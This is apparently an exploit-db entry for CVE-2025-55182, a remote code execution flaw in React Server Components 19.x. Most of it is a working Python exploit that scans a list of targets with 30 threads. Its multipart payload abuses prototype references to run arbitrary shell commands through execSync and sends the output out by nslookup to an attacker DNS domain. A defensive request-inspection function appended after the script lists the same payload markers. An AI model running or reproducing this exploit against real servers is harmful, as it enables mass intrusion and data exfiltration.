React Server 19.2.0 - Remote Code Execution

09 Apr 2026 00:00:00 | Reported by danieljavanrad | Type: exploitdb | Source: www.exploit-db.com

CVE-2025-55182 remote code execution PoC for React Server 19.2.0.

Code
# Exploit Title:  React Server 19.2.0 - Remote Code Execution
# Date: 2025-12-05
# Exploit Author: [EynaExp] (https://github.com/EynaExp)
# Vendor Homepage: https://react.dev
# Software Link: https://react.dev/reference/rsc/server-components
# Version: [19.0.0, 19.1.0, 19.1.1, 19.2.0]
# Tested on: Windows,Linux
# CVE : CVE-2025-55182




import requests
import urllib3
from concurrent.futures import ThreadPoolExecutor, as_completed
import argparse

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Color definitions
class Colors:
    RED = '\033[91m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    BLUE = '\033[94m'
    END = '\033[0m'


print("""
            ███████╗██╗   ██╗███╗   ██╗ █████╗ ███████╗██╗  ██╗██████╗ 
            ██╔════╝╚██╗ ██╔╝████╗  ██║██╔══██╗██╔════╝╚██╗██╔╝██╔══██╗
            ██║      ╚████╔╝ ██╔██╗ ██║███████║█████╗   ╚███╔╝ ██████╔╝
            ██║       ╚██╔╝  ██║╚██╗██║██╔══██║██╔══╝   ██╔██╗ ██╔═══╝ 
            ╚███████╗  ██║   ██║ ╚████║██║  ██║███████╗██╔╝ ██╗██║     
            ╚══════╝  ╚═╝   ╚═╝  ╚═══╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚═╝     

                    CVE-2025-55182 Proof of Concept
				by EynaExp
                   GitHub: https://github.com/EynaExp
""")
print(f"{Colors.RED}Disclaimer:\nThis tool is released for EDUCATIONAL and AUTHORIZED TESTING purposes only.\nThe author is not responsible for any misuse or damage caused by this program.{Colors.END}")





class NoUsageParser(argparse.ArgumentParser):
    def error(self, message):
        # completely suppress argparse usage
        print(f"Error: {message}")
        raise SystemExit(1)

parser = NoUsageParser(description="EynaExp Scanner")

parser.add_argument('-d', required=True)
parser.add_argument('-l', required=True)
parser.add_argument('-c', required=True)
print(f"{Colors.GREEN}\n[+] APP USAGE :\n[-d] <DNS(without http/s)>\n[-l] <Targets file path(url wordlist)>\n[-c] <Command>{Colors.END}\n")



args = parser.parse_args()



dns_endpoint = args.d.strip()
targets_file_path = args.l.strip()
CMD = args.c.strip()

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
    "Next-Action": "x",
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
}
request_body = (
    "------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
    "Content-Disposition: form-data; name=\"0\"\r\n\r\n"
    "{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,"
    "\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\","
    "\"_response\":{\"_prefix\":\"process.mainModule.require('child_process').execSync('nslookup `"+CMD+"`."+dns_endpoint+"');\","
    "\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n"
    "------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
    "Content-Disposition: form-data; name=\"1\"\r\n\r\n"
    "\"$@0\"\r\n"
    "------WebKitFormBoundaryx8jO2oVc6SWP3Sad--\r\n"
)

def send_request(target_url):
    try:
        response = requests.post(target_url, headers=headers, data=request_body, timeout=10, verify=False)
        result_message = f"{Colors.GREEN}[+] {target_url} -> {response.status_code} ({len(response.content)} bytes){Colors.END}"
        
        for header_key in ["x-action", "next-action", "rsc"]:
            if header_key in response.headers:
                result_message += f"\n{Colors.BLUE}    header match: {header_key} = {response.headers.get(header_key)}{Colors.END}"

        return result_message

    except Exception as exception:
        return f"{Colors.RED}[-] {target_url} -> error: {exception}{Colors.END}"

with open(targets_file_path) as file_handle:
    target_urls = [line.strip() for line in file_handle if line.strip()]

print(f"{Colors.YELLOW}[*] Loaded {len(target_urls)} targets — starting multi-thread scan...{Colors.END}\n")
with ThreadPoolExecutor(max_workers=30) as executor:
    futures = {executor.submit(send_request, url): url for url in target_urls}

    for future in as_completed(futures):
        print(future.result())
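
A defender-side check for requests shaped like the PoC above, as an added example that is not part of the original exploit-db entry: it parses a captured multipart body and reports the markers visible in that body (prototype-walking `$id:` references and the underscore-prefixed keys). The function names, the `XB` boundary and both sample bodies are constructed here, and treating those keys as never sent by legitimate clients is an assumption.

```python
import json
import re
from email.parser import BytesParser
from email.policy import HTTP

# Reference strings as in the PoC body: a "$id:" path naming __proto__ etc.
SUSPICIOUS_REF = re.compile(r'\$\w*:(?:[^"]*:)?(?:__proto__|constructor|prototype)\b')
# Underscore-prefixed keys seen in the PoC body (assumed absent from real clients).
INTERNAL_KEYS = {"_response", "_prefix", "_formData"}

def walk(node):  # yield every (key, value) pair in a decoded JSON tree
    if isinstance(node, dict):
        for key, value in node.items():
            yield key, value
            yield from walk(value)
    elif isinstance(node, list):
        for item in node:
            yield "", item
            yield from walk(item)

def inspect_request(headers, body):
    """Return sorted findings for one captured request; empty list means clean."""
    lowered = {k.lower(): v for k, v in headers.items()}
    ctype = lowered.get("content-type", "")
    if "next-action" not in lowered or not ctype.lower().startswith("multipart/form-data"):
        return []
    raw = b"Content-Type: " + ctype.encode() + b"\r\n\r\n" + body
    findings = set()
    for part in BytesParser(policy=HTTP).parsebytes(raw).iter_parts():
        text = part.get_payload(decode=True).decode("utf-8", "replace")
        try:
            tree = json.loads(text)
        except ValueError:
            continue  # non-JSON form field
        for key, value in walk({"": tree}):
            if key in INTERNAL_KEYS:
                findings.add(f"internal key: {key}")
            if isinstance(value, str) and SUSPICIOUS_REF.search(value):
                findings.add(f"prototype reference: {value}")
    return sorted(findings)

# Constructed samples: the command string is replaced by a placeholder.
HDRS = {"Next-Action": "x", "Content-Type": "multipart/form-data; boundary=XB"}
def form(*fields):  # build a multipart body with boundary XB
    return ("".join(f'--XB\r\nContent-Disposition: form-data; name="{i}"\r\n\r\n{v}\r\n'
                    for i, v in enumerate(fields)) + "--XB--\r\n").encode()
BENIGN = form('["hello", 42]')
SUSPECT = form('{"then":"$1:__proto__:then","status":"resolved_model","_response":'
               '{"_prefix":"PLACEHOLDER","_formData":{"get":"$1:constructor:constructor"}}}', '"$@0"')
```

`inspect_request(HDRS, SUSPECT)` returns five findings and `inspect_request(HDRS, BENIGN)` returns an empty list; a hit is a reason to inspect the request and confirm the server runs a patched React version, not proof of compromise.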

Vulners AI Score: 6.8 (Medium risk)
CVSS 3.1: 10
EPSS: 0.84489